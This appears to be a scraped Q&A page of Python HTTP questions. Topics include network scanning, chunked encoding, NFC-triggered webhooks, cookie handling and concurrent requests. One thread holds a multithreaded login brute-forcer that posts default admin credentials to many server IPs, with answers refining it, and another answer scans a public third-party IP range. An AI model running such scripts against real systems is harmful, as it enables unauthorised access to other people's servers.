http checks python - python

learning python here, I want to check if anybody is running a web server on my local
network, using this code, but it gives me a lot of error in the concole.
#!/usr/bin/env python
import httplib
last = 1
while last <> 255:
url = "10.1.1." + "last"
connection = httplib.HTTPConnection("url", 80)
connection.request("GET","/")
response = connection.getresponse()
print (response.status)
last = last + 1

I do suggest changing the while loop to the more idiomatic for loop, and handling exceptions:
#!/usr/bin/env python
import httplib
import socket
for i in range(1, 256):
try:
url = "10.1.1.%d" % i
connection = httplib.HTTPConnection(url, 80)
connection.request("GET","/")
response = connection.getresponse()
print url + ":", response.status
except socket.error:
print url + ":", "error!"
To see how to add a timeout to this, so it doesn't take so long to check each server, see here.

as pointed out, you have some basic
quotation issues. but more fundamentally:
you're not using Pythonesque
constructs to handle things but
you're coding them as simple
imperative code. that's fine, of course, but below are examples of funner (and better) ways to express things
you need to explicitly set timeouts or it'll
take forever
you need to multithread or it'll take forever
you need to handle various common exception types or your code will crash: connections will fail (including
time out) under numerous conditions
against real web servers
10.1.1.* is only one possible set of "local" servers. RFC 1918 spells out that
the "local" ranges are 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255, and
192.168.0.0 - 192.168.255.255. the problem of
generic detection of responders in
your "local" network is a hard one
web servers (especially local
ones) often run on other ports than
80 (notably on 8000, 8001, or 8080)
the complexity of general
web servers, dns, etc is such that
you can get various timeout
behaviors at different times (and affected by recent operations)
below, some sample code to get you started, that pretty much addresses all of
the above problems except (5), which i'll assume is (well) beyond
the scope of the question.
btw i'm printing the size of the returned web page, since it's a simple
"signature" of what the page is. the sample IPs return various Yahoo
assets.
import urllib
import threading
import socket
def t_run(thread_list, chunks):
t_count = len(thread_list)
print "Running %s jobs in groups of %s threads" % (t_count, chunks)
for x in range(t_count / chunks + 1):
i = x * chunks
i_c = min(i + chunks, t_count)
c = len([t.start() for t in thread_list[i:i_c]])
print "Started %s threads for jobs %s...%s" % (c, i, i_c - 1)
c = len([t.join() for t in thread_list[i:i_c]])
print "Finished %s threads for job index %s" % (c, i)
def url_scan(ip_base, timeout=5):
socket.setdefaulttimeout(timeout)
def f(url):
# print "-- Trying (%s)" % url
try:
# the print will only complete if there's a server there
r = urllib.urlopen(url)
if r:
print "## (%s) got %s bytes" % (url, len(r.read()))
else:
print "## (%s) failed to connect" % url
except IOError, msg:
# these are just the common cases
if str(msg)=="[Errno socket error] timed out":
return
if str(msg)=="[Errno socket error] (10061, 'Connection refused')":
return
print "## (%s) got error '%s'" % (url, msg)
# you might want 8000 and 8001, too
return [threading.Thread(target=f,
args=("http://" + ip_base + str(x) + ":" + str(p),))
for x in range(255) for p in [80, 8080]]
# run them (increase chunk size depending on your memory)
# also, try different timeouts
t_run(url_scan("209.131.36."), 100)
t_run(url_scan("209.131.36.", 30), 100)

Remove the quotes from the variable names last and url. Python is interpreting them as strings rather than variables. Try this:
#!/usr/bin/env python
import httplib
last = 1
while last <> 255:
url = "10.1.1.%d" % last
connection = httplib.HTTPConnection(url, 80)
connection.request("GET","/")
response = connection.getresponse()
print (response.status)
last = last + 1

You're trying to connect to an url that is literally the string 'url': that's what the quotes you're using in
connection = httplib.HTTPConnection("url", 80)
mean. Once you remedy that (by removing those quotes) you'll be trying to connect to "10.1.1.last", given the quotes in the previous line. Set that line to
url = "10.1.1." + str(last)
and it could work!-)

Related

Stop multiprocessing from going through entire list for function for bruteforcer

I am trying to make a brute forcer for my ethical hacking class using multiprocessing, I want it to iterate through the list of server IP's and try one login for each of them, but it is printing every single IP before trying to make connections, and then once all the IP's have been printed, it will start trying to make connections then print a couple IP's, then try to make another connection, and so on.
I just want it to iterate through the list of IP's and try to connect to each one, one process for each connection and try about 20 processes at a time
import threading, requests, time, os, multiprocessing
global count2
login_list=[{"username":"admin","password":"Password1"}]
with open('Servers.txt') as f:
lines = [line.rstrip() for line in f]
count=[]
for number in range(len(lines)):
count.append(number)
count2 = count
def login(n):
try:
url = 'http://'+lines[n]+'/api/auth'
print(url)
if '/#!/init/admin' in url:
print('[~] Admin panel detected, saving url and moving to next...')
x = requests.post(url, json = login_list)
if x.status_code == 422:
print('[-] Failed to connect, trying again...')
print(n)
if x.status_code == 403:
print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
time.sleep(20)
print(n)
if x.status_code == 200:
print('\n[~] Connection successful! Login to '+url+' saved.\n')
print(n)
except:
print('[#] No more logins to try for '+url+' moving to next server...')
print('--------------')
if __name__ == "__main__":
# creating a pool object
p = multiprocessing.Pool()
# map list to target function
result = p.map(login, count2)
An example of the Server.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP adresses
I think you're confused about how the subprocess map function passes values to the relevant process. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError
IPLIST = ['83.88.223.86:9000',
'75.37.144.153:9000',
'138.244.6.184:9000',
'34.228.116.82:9000',
'125.209.107.178:9000',
'33.9.12.53:9000',
'www.google.com']
PARAMS = {'username': 'admin', 'password': 'passw0rd'}
def err(msg):
print(msg, file=sys.stderr)
def process(ip):
with requests.Session() as session:
url = f'http://{ip}/api/auth'
try:
(r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
except ConnectionError:
err(f'Unable to connect to {url}')
except HTTPError:
err(f'HTTP {r.status_code} for {url}')
except Exception as e:
err(f'Unexpected exception {e}')
def main():
with Pool() as pool:
pool.map(process, IPLIST)
if __name__ == '__main__':
main()
Additional notes: You probably want to specify a timeout otherwise unreachable addresses will take a long time to process due to default retries. Review the exception handling.
The first thing I would mention is that this is a job best suited for multithreading since login is mostly waiting for network requests to complete and it is far more efficient to create threads than to create processes. In fact you should create a thread pool whose size is equal to the number of URLs you will be posting to up to a maximum of say a 1000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading your worker function, login in this case, is processing a single element of the iterable that is being passed to the map function. I think you get that. But instead of passing to map the list of servers you are passing a list of numbers (which are indices) and then login is using that index to get the information from the lines list. That is rather indirect. Also, the way you build the list of indices could have been simplified with one line: count2 = list(range(len(lines))) or really just count2 = range(len(lines)) (you don't need a list).
Third, in your code you say that you are retrying certain errors but there is actually no logic to do so.
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time
# This must be a dict not a list:
login_params = {"username": "admin", "password": "Password1"}
with open('Servers.txt') as f:
servers = [line.rstrip() for line in f]
def login(session, server):
url = f'http://{server}/api/auth'
print(url)
if '/#!/init/admin' in url:
print(f'[~] Admin panel detected, saving {url} and moving to next...')
# To move on the next, you simply return
# because you are through with this URL:
return
try:
for retry_count in range(1, 4): # will retry up to 3 times certain errors:
r = session.post(url, json=login_params)
if retry_count == 3:
# This was the last try:
break
if r.status_code == 422:
print(f'[-] Failed to connect to {url}, trying again...')
elif r.status_code == 403:
print(f'[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying {url} again in 20 seconds')
time.sleep(20)
else:
break # not something we retry
r.raise_for_status() # test status code
except Exception as e:
print('Got exception: ', e)
else:
print(f'\n[~] Connection successful! Login to {url} saved.\n')
if __name__ == "__main__":
# creating a pool object
with ThreadPool(min(len(servers), 1000)) as pool, \
requests.Session() as session:
# map will return list of None since `login` returns None implicitly:
pool.map(partial(login, session), servers)

Python3 ThreadingHTTPServer fails to send chunked encoded response

I'm implementing a simple reverse proxy in Python3 and I need to send a response with transfer-encoding chunked mode.
I've taken my cues from this post but I have some problems when sending the chunks in the format described here
If I send chunks of length <= 9 bytes the message is received correctly by the client, otherwise when sending chunks of length >= 10 bytes, it seems that some of them are not received and the message remains stuck in the client waiting indefinitely
Here is an example of non working code:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
class ProxyHTTPRequestHandler(BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
def do_GET(self, body=True):
# HTTP 200 + minimal HTTP headers in response
self.send_response(200)
self.send_header('transfer-encoding', 'chunked')
self.send_header('Content-Type', 'text/plain')
self.end_headers()
# writing 5 chunks of 10 characters
for i in range(5):
text = str(i+1) * 10 # concatenate 10 chars
chunk = '{0:d}\r\n'.format(len(text)) + text + '\r\n'
self.wfile.write(chunk.encode(encoding='utf-8'))
# writing close sequence
close_chunk = '0\r\n\r\n'
self.wfile.write(close_chunk.encode(encoding='utf-8'))
def main():
try:
server_address = ('127.0.0.1', 8099)
# I use ThreadingHTTPServer but the problem persists also with HTTPServer
httpd = ThreadingHTTPServer(server_address, ProxyHTTPRequestHandler)
print('http server is running')
httpd.serve_forever()
except KeyboardInterrupt:
print(" ^C entered, stopping web server...")
httpd.socket.close()
if __name__ == '__main__':
main()
In this case, after several seconds, and only if I manually stop python execution the result in Postman is the following. Please note the missing "2222222222" chunk
But if I use this length instead:
# writing the same 5 chunks of 9 characters
for i in range(5):
text = str(i+1) * 9 # concatenate 9 chars
chunk = '{0:d}\r\n'.format(len(text)) + text + '\r\n'
self.wfile.write(chunk.encode(encoding='utf-8'))
# writing close sequence
close_chunk = '0\r\n\r\n'
self.wfile.write(close_chunk.encode(encoding='utf-8'))
The communication ends correctly (after 6ms all the 5 chunks are interpreted correctly)
Some version informations:
HTTP Client: Postman 8.10
(venv) manuel#MBP ReverseProxy % python -V
Python 3.9.2
(venv) manuel#MBP ReverseProxy % pip freeze
certifi==2021.10.8
charset-normalizer==2.0.6
idna==3.2
requests==2.26.0
urllib3==1.26.7
Thanks in advance for any hints!
I post the solution (thanks to Martin Panter from bugs.python.org) in case anyone else will have the same problem in the future.
The behaviour was caused by the chunk size part, that must be in hex format,
not decimal.
Unfortunately from the Mozilla docs the format was not specified and the example used only length < 10. A formal definition is found here
In conclusion, the working version is the following (using {0:x} instead of {0:d})
# writing the same 5 chunks of 9 characters
for i in range(5):
text = str(i+1) * 9 # concatenate 9 chars
chunk = '{0:x}\r\n'.format(len(text)) + text + '\r\n'
self.wfile.write(chunk.encode(encoding='utf-8'))
# writing close sequence
close_chunk = '0\r\n\r\n'
self.wfile.write(close_chunk.encode(encoding='utf-8'))

nfcpy retrieves the URL from a NFC tag. But how do I open the link?

What I want:
I want my Raspberry Pi to act as a NFC-reader that can trigger the URL record from a NFC tag.
My setup is a Raspberry Pi with a PN532 NFC HAT and nfcpy. I am using the example tagtool.py and right now I am able to scan the NFC-tag and then show the URL (+ some extra data)
But I want the system to run the URL which triggers a webhook on IFTTT (which then triggers a playlist on Spotify...)
What I have done so far:
I have used setup.py to install nfcpy and experimented a bit with the commands. But when I run the command
python3 tagtool.py --device tty:S0:pn532 -d nfc.ndef.UriRecord -l
It first returns this
[main] enable debug output for 'nfc.ndef.UriRecord'
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **
and then when I scan one of my NFC tags - which have a URL in URI Record - with the reader I get this message.
Type2Tag 'NXP NTAG213' ID=04EA530A3E4D80
NDEF Capabilities:
readable = yes
writeable = yes
capacity = 137 byte
message = 67 byte
NDEF Message:
record 1
type = 'urn:nfc:wkt:U'
name = ''
data = b'\x04maker.ifttt.com/trigger/Playlist_022/with/key/bVTin_XXEEEDDDDEEEEEE'
[main] *** RESTART ***
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **
As you can see the URL is right there under data (+b\x04 but without https:\ but I guess thats quite easy to change). So basically I just need to trigger it.
I read somewhere that I could use curlify so I have used the command 'pip3 install curlify' and made some changes to tagtool.py.
The original tagtool.py (which I believe is the most important part for what I am trying to do) looks like this
if tag.ndef:
print("NDEF Capabilities:")
print(" readable = %s" % ("no", "yes")[tag.ndef.is_readable])
print(" writeable = %s" % ("no", "yes")[tag.ndef.is_writeable])
print(" capacity = %d byte" % tag.ndef.capacity)
print(" message = %d byte" % tag.ndef.length)
if tag.ndef.length > 0:
print("NDEF Message:")
for i, record in enumerate(tag.ndef.records):
print("record", i + 1)
print(" type =", repr(record.type))
print(" name =", repr(record.name))
print(" data =", repr(record.data))
In the new tagtool2.py I have added this to the start of the document
import curlify
import requests
And then I have added this line
response = requests.get("https://repr(record.data)")
print(curlify.to_curl(response.request))
Which means it looks like this. And this is probably wrong in several ways:
if tag.ndef:
print("NDEF Capabilities:")
print(" readable = %s" % ("no", "yes")[tag.ndef.is_readable])
print(" writeable = %s" % ("no", "yes")[tag.ndef.is_writeable])
print(" capacity = %d byte" % tag.ndef.capacity)
print(" message = %d byte" % tag.ndef.length)
if tag.ndef.length > 0:
print("NDEF Message:")
for i, record in enumerate(tag.ndef.records):
print("record", i + 1)
print(" type =", repr(record.type))
print(" name =", repr(record.name))
print(" data =", repr(record.data))
response = requests.get("https://repr(record.data)")
print(curlify.to_curl(response.request))
Because when I try to trigger the URL with a NFC tag I get this message:
Type2Tag 'NXP NTAG213' ID=04EA530A3E4D80
NDEF Message:
record 1
type = 'urn:nfc:wkt:U'
name = ''
data = b'\x04maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE'
[urllib3.connectionpool] Starting new HTTPS connection (1): repr(record.data):443
[nfc.clf] HTTPSConnectionPool(host='repr(record.data)', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0xb579a650>: Failed to establish a new connection: [Errno -2] Name or service not known'))
Can anyone tell me what I am doing wrong? And if curlify is the right way to go?
What you are doing wrong is that the data stored in the NDEF message is encoded, you cannot just open a connection using the raw data you have to decode it first using the correct type. (as the encoded value has a Hex number in it)
It is also encoded in utf-8 so Python treats it as bytes not as a string type object.
So the type says it is a URI record type as you used 'nfc.ndef.UriRecord' (Don't know why call it urn instead)
So the Hex number \x04 means https://
Unfortunately I don't think anybody has written a decoder method for the NFC Uri specification only encoders.
Here is a link full spec for the NDEF URI record type
once you have replaced the Hex character in the data with the correct decoded value you will get the URL https://maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE
a simple example (where a stores the value instead of record.data)
import re
a = b'\x04maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE'
a_text = a.decode('utf-8')
x = re.sub('\x04', 'https://', a_text)
print(x)
requests.get(x)
Then you can use requests.get() on the decoded value
This turned out to be the simple but good solution for my needs.
if tag.ndef:
if tag.ndef.length > 0:
#print("NDEF Message:")
for i, record in enumerate(tag.ndef.records):
print(record.uri)
response = requests.get(record.uri)
print(curlify.to_curl(response.request))
I started out with a way more complicated solution. I am keeping it here if anybody runs into similar problems.
Since the first take, I have cleaned out some of the print() lines as well, and I know I can clean out some more lines, but I am keeping them here to make it easier to see whats happening.
Its especially worth noticing the y variable. I was left with an almost perfect URL, but I kept getting errors because of an extra ' at the end of the URL.
if tag.ndef:
if tag.ndef.length > 0:
for i, record in enumerate(tag.ndef.records):
print(repr(record.data))
print(str(record.data))
org_string = str(record.data)
mod_string = org_string[6:]
y = mod_string.rstrip(mod_string[-1])
w = "https://"
print(mod_string)
print(y)
print(w)
response = requests.get(w + y)
print(curlify.to_curl(response.request))
The code can be improved, but it works and it gives me this message and - more important - it triggers the URL on the NFC tag (I have scrambled the IFTTT webhook).
Type2Tag 'NXP NTAG215' ID=04722801E14103
b'\x04maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao'
b'\x04maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Aoo'
maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao'
maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao
https://
[urllib3.connectionpool] Starting new HTTPS connection (1): maker.ifttt.com:443
[urllib3.connectionpool] https://maker.ifttt.com:443 "GET maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao HTTP/1.1" 200 69
curl -X GET -H 'Accept: */*' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'User-Agent: python-requests/2.21.0' https://maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao
[main] *** RESTART ***
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **

Python Cookielib with HTTP Servers that Have Incorrect Date / Timezone Set

I am using python and cookielib to talk to an HTTP server that has its date incorrectly set. I have no control over this server, so fixing its time is not a possibility. Unfortunately, the server's incorrect time messes up cookielib because the cookies appear to be expired.
Interestingly, if I go to the same website with any web browser, the browser accepts the cookie and it gets saved. I assume that modern webbrowsers come across misconfigured web servers all the time and see that their Date header is set incorrectly, and adjust cookie expiration dates accordingly.
Has anyone come across this problem before? Is there any way of handling it within Python?
I hacked together a solution that includes live-monkey patching of the urllib library. Definitely not ideal, but if others find a better way, please let me know:
cook_proc = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
cookie_processing_lock = threading.Lock()
def _process_cookies(request, response):
'''Process cookies, but do so in a way that can handle servers with bad
clocks set.'''
# We do some real monkey hacking here, so put it in a lock.
with cookie_processing_lock:
# Get the server date.
date_header = cookielib.http2time(
response.info().getheader('Date') or '')
# Save the old cookie parsing function.
orig_parse = cookielib.parse_ns_headers
# If the server date is off by more than an hour, we'll adjust it.
if date_header:
off_by = time.time() - date_header
if abs(off_by) > 3600:
logging.warning("Server off %.1f hrs."%(abs(off_by)/3600))
# Create our monkey patched
def hacked_parse(ns_headers):
try:
results = orig_parse(ns_headers)
for r in results:
for r_i, (key, val) in enumerate(r):
if key == 'expires':
r[r_i] = key, val + off_by
logging.info("Fixing bad cookie "
"expiration time for: %s"%r[0][0])
logging.info("COOKIE RESULTS: %s", results)
return results
except Exception as e:
logging.error("Problem parse cookie: %s"%e)
raise
cookielib.parse_ns_headers = hacked_parse
response = cook_proc.http_response(request, response)
# Make sure we set the cookie processor back.
cookielib.parse_ns_headers = orig_parse

Multiple simultaneous HTTP requests

I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in number to several thousand.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stackoverflow (Specifically, What is the fastest way to send 100,000 HTTP requests in Python? ), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
One additional issue that I'm facing is that the keyboard interrup method never fires (I'm trying with Ctrl+C but it does not kill the script.
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue
requestURLBase = "https://example.com/api"
apiKey = "123456"
concurrent = 200
keepTrying = 1
def doWork():
while keepTrying == 1:
url = q.get()
status, body, url = checkStatus(url)
checkResult(status, body, url)
q.task_done()
def checkStatus(ourl):
try:
url = urlparse(ourl)
conn = httplib.HTTPConnection(requestURLBase)
conn.request("GET", url.path)
res = conn.getresponse()
respBody = res.read()
conn.close()
return res.status, respBody, ourl #Status can be 210 for error or 300 for successful API response
except:
print "ErrorBlock"
print res.read()
conn.close()
return "error", "error", ourl
def checkResult(status, body, url):
if "unavailable" not in body:
print status, body, url
keepTrying = 1
else:
keepTrying = 0
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
except KeyboardInterrupt:
sys.exit(1)
I'm new to Python so there could be syntax errors as well... I'm definitely not familiar with multi-threading so perhaps I'm doing something else wrong as well.
In the code, the list is only read once. Should be something like
try:
while True:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
For the interrupt thing, remove the bare except line in checkStatus or make it except Exception. Bare excepts will catch all exceptions, including SystemExit which is what sys.exit raises and stop the python process from terminating.
If I may make a couple comments in general though.
Threading is not a good implementation for such large concurrencies
Creating a new connection every time is not efficient
What I would suggest is
Use gevent for asynchronous network I/O
Pre-allocate a queue of connections same size as concurrency number and have checkStatus grab a connection object when it needs to make a call. That way the connections stay alive, get reused and there is no overhead in creating and destroying them and the increased memory use that goes with it.

Categories